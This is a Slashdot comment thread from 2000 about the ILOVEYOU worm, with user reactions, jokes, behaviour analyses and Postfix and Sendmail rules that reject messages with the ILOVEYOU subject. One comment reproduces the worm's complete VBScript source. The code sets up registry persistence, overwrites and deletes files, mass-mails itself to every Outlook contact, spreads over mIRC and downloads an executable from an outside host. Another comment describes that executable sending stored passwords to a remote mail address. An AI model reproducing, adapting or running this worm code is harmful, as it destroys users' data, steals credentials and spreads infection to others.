I Love You "Virus" Hates Everyone

Loquis was the first of seven billion readers to submit this story about the I Love You Virus and the UK. Its not really a virus: its a trojan that proclaims its love for the recipient and requests that you open its attachment. On a first date even! It then loves you so much that it sends copies of itself to everyone in your addressbook (slut!) and starts destorying files on your drive. Course they estimate that it's infected 10% of the UK. Pine/Elm/Mutt users as always laugh maniacally as the trojan shuffles countless wasted packets over saturated backbones filling overworked SMTP servers everywhere. Sysadmins are seen weeping in the alleys. Update: 05/04 03:12 by CT : My Roommate Kurt "The Pope" DeMaagd has written a better summary of the trojan and more importantly a HOWTO fix it. Windows users only ;) Requires registry hacking, so its not for everyone.

This hit where I work.

[Shadowlion (18254)]

I have Outlook 2000 open as we speak.

So far, I've received (estimated) about fifty copies of the damn thing. It's funny, in a "well, hey, look - a train wreck" sort of way.

Dunno about the virus...

[BrianW (180468)]

But the number of "If you get an email that says 'I love you', DON'T OPEN IT!" messages are getting a bit annoying.

Clean up

[xianzombie (123633)]

As far as i know, the virus started out in Asia (somewhere) and made its way to Europe and now the US (Including many millitary installations as well).

Sites I've found that offer disenfectants are a post on ZDNet http://www.zdnet.com/tlkbck/comment/22/0,7056,8875 4-421758,00.html, as well as http://www.f-source.com

good luck people

Re:This hit where I work.

[Shadowlion (18254)]

On the other hand, I'm personally not stupid enough to open an attachment like this (especially with the obvious tagline of "LOVE-LETTER-FOR-YOU.TXT.vbs" - gee, you think that's a Visual Basic script?).

I should really be compiling a list of the coworkers I'm receiving this from. It always pays to know where stupidity is in the org chart.

Maybe this can get companies to consider UNIX?

[jaf (121858)]

Our company was just hit by this - one NT server and two workstations down.. it deletes and renames files like there's no tomorrow.

UNIX would not have a problem here..

Maybe in the long run though - but at least a virus would "only" be able to do what the user can do - not nuke the system.

People still have to be dumb enough to open the attachment.

I got it.....

[peterdaly (123554)]

The nice thing about virus's like this is you find out about people you never met who have you in their address book....at least in my case. -Pete

Re:Looks a bit like Melisa

[deasmi (97040)]

The first two lines of the script are quite ammusing.

rem barok -loveletter(vbe) rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines

I do hope that's not his real address....

Total Cost of ownership if Outlook/Exchange

[smartin (942)]

This is the second time in a couple of months that I've been at a company where this sort of thing has gone around and around. Companys really need to be aware of the consequences of using Outlook and Exchange. This does not happen when you are using Sendmail and a regular POP3 or IMAP client.

Well Damn

[zpengo (99887)]

Now I have to tell my girlfriend to delete all my old e-mails, because they had that subject line, and you never know!

Re:OPening e-mail attachments

[akey (29718)]

OK - I suppose it's wishful thinking to hope that users would realize by now not to open e-mail attachments they know nothing about...

Personally, I loved the quote from the journalist who said that she was suspicious when she received 5 copies of it, but since the last one was from Dow Jones, she opened it anyway... :-)

---

Solution for Postfix

[njr (115982)]

If not active in /etc/postfix/main.cf uncomment the line and change it to a line similar to:

header_checks = regexp:/etc/postfix/header_checks

Add the following line in /etc/postfix/header_checks:

/^Subject: ILOVEYOU/ REJECT

This will reject mails containing this subject.

Thanks to Claus Guttesen who posted this on the postfix mailling list.

Source at ftp://weazel.student.utwente.nl/pub/

[by Anonymous Coward]

It's a very nasty trojan, especially because it starts automatically after a reboot. To be sure what is does and doesn't, look at: ftp://weazel.student.utwente.nl/pub/mailworm.txt

Fast spread, but better handled?

[redelm (54142)]

I never saw Melissa, but I did get three copies of ILOVEYOU thanks to the corporate-wide mailing list. That was this morning. Since then, our mailadmins have done an admirable job, and I've seen none. I'm glad somebody took Melissa as a wake-up call.

Pretty Nasty actually

[scrutty (24640)]

We got hit in our office this morning. Obviously the techs like me were running Linux and laughed it off. But unlike Melissa this one actually carries a nasty payload.

It mails to everyone in your Outlook addressbook, not just 50. Also your MIRC nick list. It trawls all your mounted directories copying itself over all MP3's JPEGS .jpgs, style sheets and .js files amongst others

This actually managed to knock out half of our office , as well as render one of our live web servers pretty messed up , within under 10 minutes of the first person activating it. Yes, the webserver was a linux box, but one unfortunate had a subtree on a server that mirrored stuff to it mounted over a samba share

And no, you didn't have to click on it. That damn preview pane was enough to trigger it off.

E-mail too versatile?

[zpengo (99887)]

Perhaps we should go back to the days of simple e-mail clients, that would make a virus like this look around, get confused, and then fall over.

Either that, or people need to stop using the address books, which are for lusers anyway! :o)

It's hitting all over Europe.

[Noryungi (70322)]

My job's sysadmin has already warned us that the virus was in the wild somewhere, and has asked us *not* to open anything suspicious.

I know that several large firms in my area are also scrambling to stop the infection. This virus can stop any MS system dead in its tracks and clog the others beyond repair. Tough little one!

Outlook Strikes Again.

[nard (165611)]

From my initial investigation it looks like it is totally MS Specific. So own up then how many /. readers have been kicked in the balls? Come out of the closet all of you!

Next step: AutoEducation.exe

[FascDot Killed My Pr (24021)]

This virus follows the same pattern of "send to everyone in the address book", but ALSO appends the senders name to a data file included with the virus.

The recipient then falls into one of three classes:

1) Can't get/read virus.
2) Can get/read virus and gets stung (and appended to list).
3) Can get/read virus, doesn't get stung, recieved handy list of idiot coworkers.

This list can be used in a multitude of ways:

1) Reduce headcount
2) List of gullible fools who will buy $2 candy bars "to send the Girl Scouts to the Moon"
3) Identify users who need "training" (sit in a small hot room with each other and an instructor who does nothing but taunt them for their hunt-n-pecking)

--
Have Exchange users? Want to run Linux? Can't afford OpenMail?

*sob*

[Raymond Luxury Yacht (112037)]

The only love letter I've ever gotten... and I can't open it....

Re:Analysis

[by Anonymous Coward]

Sorry - lost the /n's there

It's a VBS worm. It spreads by two methods, irc and email.

On startup it sets the registry key
HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout
to 0

It then copies itself to WINNT/SYSTEM32/MSKernel32.vbs
WINNT/Win32DLL.vbs
WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.TXT

It then creates registry keys

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu rrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu rrentVersion\RunServices\Win32DLL

which will run the script again on the next boot of the computer

Next it checks to see if ie download directory is set in the registry
- if it is it remembers that value, otherwise it uses c:\ instead.

It then checks to see it /WINNT/SYSTEM32/WInFAT32.exe exists - if it does
it sets internet explorers start page to download a file called WIN-BUGSFIX.exe from one of 4 places (randomly chosen) on www.skyinet.net

It then checks to see it this file has been downloaded (i.e. when the script is run at a later date). If it has to sets this .exe to be run at next boot and resets i.e home page to about:blank (blank page)

Next, it generates the file WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.HTM
This basically contains the worm itself set to run when the page is
viewed.

Now it does to old trick of openning the Outlook address book, grabbing
*all* the entries in it and emailing then an email with the subject line "ILOVEYOU" and the worm as an attachment.

Now it has a look around all the drives on the machine (local drives I think) as does the following
a) If it find mirc, edits it's ini file so when you next log onto an
irc channel it dcc's itself to all the other users
b) Overwrites any .vbs and .vbe files it finds with itself
c) If it finds any vbs, vbe, css,, wsh, sct or hta files it deletes them,
creates a new file with the same name ending in vbs and copies itself to
it
d) Does similar things to (c) to .mp3, .mp2, .jpg, .jpeg

Then the script ends

Stuart

Re:Total Cost of ownership if Outlook/Exchange

[sTeF (8952)]

it's indifferent, if you use sendmail or exchange it depends on the os, if your os is capable of running vb crap, and you e-mail client is configured to run it, then you suffer, i can imagine pine running on window, with a mailcap entry for vbs files... but most nobody is that stupid.

Here is the Visual Basic Script that is "ILOVEYOU"

[GC (19160)]

rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micr osoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MSKernel32",dirsystem&"\ MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\RunServices\Win32DLL",dirwin &"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micr osoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhj kxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7 679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfd jghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRp Gqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbv g/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNB mnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPh jasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg /WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\WIN-BUGSFIX",downread&"\ WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eqfolderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software \Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Softwar e\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR -YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="LOVELETTER - HTML"&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
"

This HTML file need ActiveX Control

To Enable to read this HTML file
- Please press #-#YES#-# button to Enable ActiveX"&vbcrlf& _
"----------z--------------------z---------- "&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+ch r(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+c hr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+ch r(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-Y OU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU .HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub

Linux version

[hoss10 (108367)]

> Pine/Elm/Mutt users as always laugh maniacally
Stop being so arrogant. It's just an executable attachment.

For a linux version just write a bash script that'll read the users address book and send it on aswell.

This is one reason NOT to want world domination. In that case it'll spread easily

------------------------------------------------ -
"If I can shoot rabbits then I can shoot fascists" -

Re:OPening e-mail attachments

[slim (1652)]

OK - I suppose it's wishful thinking to hope that users would realize by now not to open e-mail attachments they know nothing about...

As I understand it (second hand), if the mail shows up in a preview pane in Outlook Express, then the script runs without user intervention.

Now *that* is crappy design...
--

Microsoft Announcement

[Sargent1 (124354)]

Early this morning, in response to the virus, the AP had the following report about Microsoft:

--

SEATTLE (AP) -- In response to the "ILOVEYOU" virus, Microsoft has announced that they are changing the name of their popular e-mail program to "Microsoft Lookout!"

"Really, what else could we do?" said Steve Ballmer, president of Microsoft. "I mean, first the Melissa virus, and then this. Sure, we probably should plug these security holes in Outlook -- whoops, make that Lookout! -- but we felt the name change was the most proactive step we could take short of releasing better programs."

"At least the virus didn't say 'BILLGATESLOVEYOU'," he added. "Geez, that could've been bad."

--

Sargent

Re:Solution for Postfix

[otmar (32000)]

Sendmail can filter that crap as well, just add

HSubject: $>local_check_header_subject
D{loveletterMessage}"553 Your message may contain a worm."
Slocal_check_header_subject
RILOVEYOU $#error $: ${loveletterMessage}

to your sendmail.cf (version > 8.9 !).

(there is a tab between the ILOVEYOU and $#error.)

/ol (credits go to a cow-orker, though)

Re:E-mail too versatile?

[ptomblin (1378)]

The problem isn't just that email is too versatile, but that people are too damned stupid. I could send a malicious linux binary via "mutt", and some idiot somewhere would be stupid enough to execute it.
--
A "freaking free-loading Canadian" stealing jobs from good honest hard working Americans since 1997.

Funniest thing I've read in years!

[ToLu the Happy Furby (63586)]

From the MSNBC article [msnbc.com]:

"It crashed all the computers," said Daphne Ghesquiere, a Dow Jones spokeswoman in Hong Kong. "You get the message and the topic says ILOVEYOU, and I was among the stupid ones to open it. I got about five at one time and I was suspicious, but one was from Dow Jones Newswires, so I opened it."

Once the message was opened, Ghesquiere said, it began sending the virus to other e-mail addresses within the Dow Jones computers, blocking people's ability to send and receive e-mail. Victims sometimes received dozens of e-mails, all contaminated.

"I have no idea how it got through the firewall," Ghesquiere said. "It's supposed to be protected." (emphasis mine)

The acticle even has a screen shot of the oh-so-unsuspicious attachment: "LOVE-LETTER-FOR-YOU.TXT.vbs".

Now, I'm generally all for grandmothers sending email and not-everyone-should-have-to-be-able-to-configure-X 11-to-use-the-Internet and all of that, but shouldn't there be a law against letting people this ignorant operate important computers in financial institutions??

I mean, I'm joking of course.

Or at least I think I'm joking...

Re:Total Cost of ownership if Outlook/Exchange

[Malachi (5716)]

I think we need to see some responsibility on M$'s part to add some checks and balances to their open ended VB scripted Outlook. While we too got his by a Melissa like virus last month the Unix group just chuckled as the windows chickens ran about trying to stop the fire from spreading, or sending more spam by trying to tell people to not check it.

Curiously, can we file suit if one of these things gets really nasty? The last one that hit us just sent the person to a p0rn site and everyone in their addr book, reg keys, desktop, startup. What if this had been a formating virii? Talk about large scale data loss.

-Malachi-

About ILOVEYOU

[TomV (138637)]

first up, I don't like the guy's coding style one bit :)

So what is it and what does it do?

It's a VBScript file using the Windows Script Host runtime (wscript.exe), which is on any W98 or W2k systems, plus those with IE4 or higher (plus several other products install it).

It propagates using OLE Automation against Outlook (any version), propagating both to Lists and individual addresses (internal function spreadtoemail()

It dicks with the registry to make one of four URL's at skyinet.net ending in /WIN-BUGFIX.exe into IE's start page (IE only as it uses IE's registry entries to do this).

Replaces any file of types vbs, vbe, js, jse, css, wsh, sct, hta, jpg, jpeg, mp2, mp3 with a copy of itself.

Places copies of itself into \windows and \windows\system as win32DLL.vbs and MSkernel32.vbs and tweaks the registry so that these are loaded at startup

builds a webpage and displays it, including a request for the user to disable ActiveX security.

If you're non Win32 it's totally irrelevant. If you're Win32 but don't use Outlook it'll bugger about with some files but won't propagate. If you're Windows All The Way then it's trouble.

Not only don't i like his coding style, but he doesn't even realize you can encode vbs files for obfuscation.

It's hit 340 lists at our firm so far.

TomV

Re:Pretty Nasty actually

[fooeyploo (150566)]

I really think Microsoft has been getting a lot of things backwards. I think a more appropriate name for Outlook would have been Lookout!

--
Don't throw your computers out the windows. Throw the Windows out of
your computers.

LoveLetter worm: the full rundown

[RubiCon (158847)]

Okay, given a lot of the notices I've seen on this worm so far seem to be inaccurate, here's the rundown:

Files created/edited:
MSKernel32.vbs [created in System folder, copy of worm]
Win32DLL.vbs [created in Windows folder, copy of worm]
LOVE-LETTER-FOR-YOU.TXT.vbs [created in System folder, copy of worm]
LOVE-LETTER-FOR-YOU.HTM [created in System folder, web page with worm embedded in it]
WIN-BUGSFIX.exe [downloaded into default IE download folder]
WinFAT32.exe [created in System folder by WIN-BUGSFIX32.exe, unknown purpose]
*.vbs, *.vbe [overwritten with copy of worm]
*.js, *.jse, *.css, *.wsh, *.sct, *.hta [deleted, replaced with copy of worm with name <filename>.vbs]
*.jpg, *.jpeg [deleted, replaced with copy of worm with name <filename>.<ext>.vbs]
*.mp3, *.mp2 [hidden attribute set, copy of worm with name <filename>.<ext>.vbs created]
script.ini [if found in a directory with mIRC, overwritten with a script to output the HTML version of the worm to other users]

Registry keys created/edited:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run \MSKernel32 [created to run MSKernel32.vbs]
HKLM\Software\Microsoft\Windows\CurrentVersion\Run Services\Win32DLL [created to run Win32DLL.vbs]
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page [altered to attempt to download WIN-BUGSFIX.exe on browser startup]
HKLM\Software\Microsoft\Windows\CurrentVersion\Run \WIN-BUGSFIX [created to run WIN-BUGSFIX.exe once downloaded]
HKCU\Software\Microsoft\WAB\... [one entry per address book entry plus a running total used during email propagation]

From all this you can work out the basic intention of the worm. It spreads via email propagation to everyone in your address book and by being sent via mIRC to other users. It maintains its hold on a machine by putting copies of itself in the Run and RunServices registry folders and by copying itself to files that look like existing files on the machine (presumably hoping the user has Hide Known File Extensions enabled).

I'm not sure about the .exe it attempts to download (other than its marker) because all the traffic has taken the target server the file is held on (www.skyinet.net) down.

Other info: the file orginates in Manila, Philippines according to comments in the worm, the email title it uses is 'ILOVEYOU' and the email text reads 'kindly check the attached LOVELETTER coming from me.'

Umm, okay, I COULD be wrong...

[Shoden (94398)]

Just after that previous post, I went to delete those 16 messages from my deleted items folder... as soon as I selected the first message, the preview pane failed to appear. I immediately jumped to the task manager and saw "Virus - Running". I killed that and Outlook, which had stopped responding. As far as I can tell, nothing was sent, and none of my files were changed.

In defense of scripting in mail.

[Raindeer (104129)]

Alot of people here are going on about how bad it is that people still use MS-Outlook etc. And how bad it is that they open attachments they don't know of.. That all being as it may, I would like to point out, that the ability to be able to run scripts etc in mail is not nescessarily a bad thing, but that this has just been poorly implemented by MS.

What I mean is this. I did my internship at a government agency which pays old age pension and child benefits in The Netherlands. They used alot of the VB possibilities you find in Office. The espescially build a very tight integration between their e-mail and the database that they have. Because they did this in this way, they were able to streamline the organisation in a great way. Alot of stuff could be streamlined through the organisation without the need for prints and reprints etc. Thankfully they had a security-officer that would refused to open up the network to the internet and decided to install one internet terminal per department. (I hope they still have that policy)

What I meant to say was that in stead of laughing at all those people using MS-products and having problems with this VB-script, we should come up with a solution that is alot safer and gives companies the same ease of use of integrating it into their organisation.

Re:Funniest thing I've read in years!

[Black Parrot (19622)]

> I got about five at one time and I was suspicious, but one was from Dow Jones Newswires, so I opened it.

So, she gets a love letter over a newswire, and that allays her suspicions?

--

simple fix

[jbarnett (127033)]

There is a really quite simple fix for this, it comes down to basic security that should be praticed at all times. For example, this worm (among others) spreads it's disease though the use of the address book in outlook express.

This address book contants email addresses that the person enjoys send/receiving email with. You could say, the address contains a list of "freinds" to the user. The best way to fix being "labeled" as a "freind" is to use words like "I hate you" and "get away from me", spitting, cursing and talking bad about the pope also are some basic security measures you can take to avoid being put into this "address book" which will be used to send virii/worms to.

Also since this is spread though the use of outlook express, which is an email program. Email programs are used to communicate between to users or person. I can only conclude that communication between humans, in any form is a major security risk and should be stoped.

The two basic security prinicpals we learned here, is

1) communication between humans is bad and should not be allowed

2) be a complete jerk so that even if rule one is broken, you will still have a "fail safe" method in which people will avoid communicatioins with you.

Re:quick fix

[Chris Hall (5155)]

does anybody know what the MS-BUGFIX.EXE file /does/ anyway?

I've not looked thoroughly (just a quick look with a disassembler at parts of it), so the following is incomplete, but among other things, it looks as though it can:

• Remove policies that prevent passwords from getting stored in the registry
• Watch every 150ms for a window entitled "Connect To", and when found select a checkbox (probably the one to remember passwords, but I've not got DUN installed on this machine, so I can't check)
• Grab all passwords stored in the registry, plus details of the machine's IP address, and that of any DNS and WINS servers.
• Connect using SMTP to smtp.super.net.ph, and send these details (and a few more, e.g. username and machine name) to mailme@super.net.ph
• Do something (not investigated what) with WinFAT32.exe
• Add policy to disable registry editing
• Set Internet Explorer's start page to about:blank

It seems incredibly poorly written. For example, lots of functions return a char* pointing to a local array. Extra padding arrays are added in an attempt to stop the stack from getting overwritten before the value is used.

Tried writing this in MS Word

[Analysis Paralysis (175834)]

Only got as far as the second line when the paper-clip winked at me and asked "It looks like you're writing a virus. Would you like help?"

Nice to see some innovation at work here...

Microsoft: Don't Innovate, Regurgitate!

Re:Here is the Visual Basic Script that is "ILOVEY

[laborit (90558)]

Oh, great.

WASHINGTON, D.C. (Reuters) - The "I Love You" e-mail virus, which has crippled hundreds of businesses and ISPs in the U.K., has been traced to an American computer discussion site. "We were baffled as to where this deadly new threat had come from," said Richard Josephs of the FBI's computer crimes division, "until we learned that the source code to the virus was available on Slashdot.org." "Source code" refers to the computer-language instructions that a programmer "compiles" to produce a wide variety of applications, from Microsoft Word to Microsoft Excel.

The FBI was informed of the code at 8:03 Wednesday by a courageous anonymous hero, who claimed he has been monitoring the slashdot.org page for evidence of illegal activity ever since it published the "source code" for DeCSS, a program invented by hackers to illegally copy and resell copyrighted DVDs over the Web.

The Department of Justice is preparing to file charges against the hacker-friendly slashdot.org, despite protests from its owners. One, a shadowy figure known only as "CmdrTac0" claims that the source code could have come from anyone who received the virus. But experts say this is unlikely, because there is no known way to keep Microsoft Outlook from launching the virus program upon receipt.

We have been unable to find the anonymous hero who reported the presence of the code on Slashdot.org, but the FBI official who spoke with him said he repeatedly asked if they had the unlisted phone number of actress Natalie Portman.

Re:Next step: AutoEducation.exe

[Black Parrot (19622)]

A friend is trying to get permission from her boss to deliberately post a virus on her corporate network one weekend per month. A virus that turns off VB scripting on any machine where it runs.

--

Re:Total Cost of ownership if Outlook/Exchange

[fooeyploo (150566)]

Maybe we should begin to consider Outlook as a DDOS tool? It sure seems to be a very effective one.

--

Don't throw your computers out the windows. Throw the Windows out of
your computers.

Your Sendmail fix works fine

[Peter Millerchip (166655)]

Moderators, please moderate the parent up! Thanks for posting it, it works great. We've now re-enabled external email and it's bounced about a million virus emails so far...

Pete.

Consequences...

[bero-rh (98815)]

Hm, now that I got a love letter from my boss, can I sue him for sexual harrassment and make big cash? ;)

[Disclaimer: I didn't actually. Being at a Unix-only place definitely has good sides.]

Stacking dynamite

[Jeremi (14640)]

The annoying bit is now the FBI is going to make it their #1 priority to track down the author of this script and charge him with "millions of dollars in damages".

That's all well and good, but I wish they'd keep in mind that he wouldn't have been able to do any of this mischief without the months of labour on the part of Microsoft engineering that laid the groundwork for this sort of thing. OLE, VB, Outlook, etc all working together to help viruses propogate.

It's as if Microsoft has been stacking tubes of dynamite in the town hall for months, and one day some fruitcake comes in with a lit match. Sure, the fruitcake is guilty, but there's some serious negligence here as well...

Jeremy, your friendly Slashdot anti-M$ zealot

Now THIS is funny - it was faxed to me

[brennan73 (94035)]

So this morning, I get a fax at work. It's directed at the old network admin, and is like six pages of junk, Windows registry settings and such. I put it aside, with the intention of calling the person later to tell them that he doesn't work here anymore and ask what in the world she sent me.

Then news of this virus starts going around, and I look closely at the fax. It says it "originated from a (COMPANY NAME) Faxcom," and has the attachment "LOVE-LETTER-FOR-YOU.TXT.vbs . Apparently, our fax number was in her computer, and it faxed us a text copy of the virus. Anyone want it? :)

-brennan

Re:Fast spread, but better handled?

[/ (33804)]

Since then, our mailadmins have done an admirable job, and I've seen none. I'm glad somebody took Melissa as a wake-up call.

You mean they took the obvious step of ceasing to use software whose crappy design makes it specifically vulnerable to this sort of virus? Or do you mean they just engaged in damage control and will still be whacked the next time such a virus comes around?

No software should be able to edit a registry file or its equivalent without specific permission from an informed user. Period.

MP3s...

[Spasemunki (63473)]

Destroys all MP3's on the system, hunh? Looks like Metallica is finally starting to wise up and fight dirty. . .

MS friendly news

[gad_zuki! (70830)]

I know this is a cliche, but where's the outrage? This is the *second* worldwide virus that uses the same type of security leak in 2 years. What I do see is lots of techies saying "I told you so," while the popular press is very uncritical of MS and Outlook. When will the press use words like 'very unsecure' when describing Outlook or just MS in general?

What do you think is the % of people who will quit using Outlook after being hit by this? 5% 1% 0%? If the press would do its job, namely informing and protecting the layman we'd see a lot less Outlook users. Instead we get 'don't open this mail, which is useless when the preview pane is always on' and 'all is well, download new virus updates, MS is still your friend.'

